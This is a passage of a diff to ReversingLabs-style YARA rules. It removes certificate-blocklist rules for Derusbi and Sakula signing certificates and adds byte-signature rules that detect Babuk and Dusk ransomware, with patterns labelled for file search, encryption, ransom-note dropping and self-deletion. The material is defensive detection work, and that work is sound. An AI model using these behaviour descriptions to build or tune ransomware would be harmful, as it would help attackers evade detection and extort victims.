+            ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D
+            04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 45
+        }
+		$find_system_volumes_v2_p1 = {
+            C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A
+            ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50
+            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ??
+            ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ??
+            ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB
+            8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ??
+            6A ?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6
+        }
+		$find_system_volumes_v2_p2 = {
+            45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ??
+            8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE
+            66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ??
+            ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3
+            0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1
+            F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6
+            F3 0F E6 C0 C1 EE
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Saly Younes" and pe.signatures [ i ] . serial == "09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( $encrypt_files_v1 ) and ( $cmd_prompt ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v2 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v3 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $encrypt_files_v4 ) and ( $drop_ransom_note_v1 ) and ( all of ( $exclude_from_encryption_v2_p* ) ) ) or ( ( $find_files ) and ( $exclude_from_encryption_v1 ) and ( any of ( $encrypt_files_v5 ) ) and ( all of ( $find_system_volumes_v2_p* ) ) ) or ( ( all of ( $encrypt_files_v5_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $find_system_volumes ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) or ( ( all of ( $encrypt_files_v6_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
+		description = "Yara rule that detects Babuk ransomware."
 		author = "ReversingLabs"
-		id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8a96f400-193f-5fd1-ba03-4da464345e1c"
+		date = "2021-01-26"
+		modified = "2021-01-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2014-L2030"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d"
+		logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Babuk"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
-		author = "ReversingLabs"
-		id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2032-L2048"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ??
+            ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B
+            0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83
+            C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ??
+            EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 50 FF 15
+        }
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ??
+            ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D
+            ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ??
+            ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ??
+            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+        }
+		$encrypt_files_p3 = {
+            C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45
+            ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ??
+            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A
+            ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ??
+            ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ??
+            69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ??
+            ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_resources = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ??
+            ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B
+            4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33
+            CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL Games Co.,Ltd." and pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
+		description = "Yara rule that detects Dusk ransomware."
 		author = "ReversingLabs"
-		id = "97005464-1219-56d7-bd5c-f047558be1dc"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "cde30f40-f13c-53da-8656-cc293433aa36"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2050-L2066"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1"
+		logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dusk"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Sakula and Derusbi malware."
-		author = "ReversingLabs"
-		id = "93707307-a250-526d-a3d4-32ed5d2a63a6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2068-L2084"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ??
+            0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
+            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
+            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
+            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
+        }
+		$dusk_delete_itself = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16
+            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ??
+            ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ??
+            ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files = {
+            20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ??
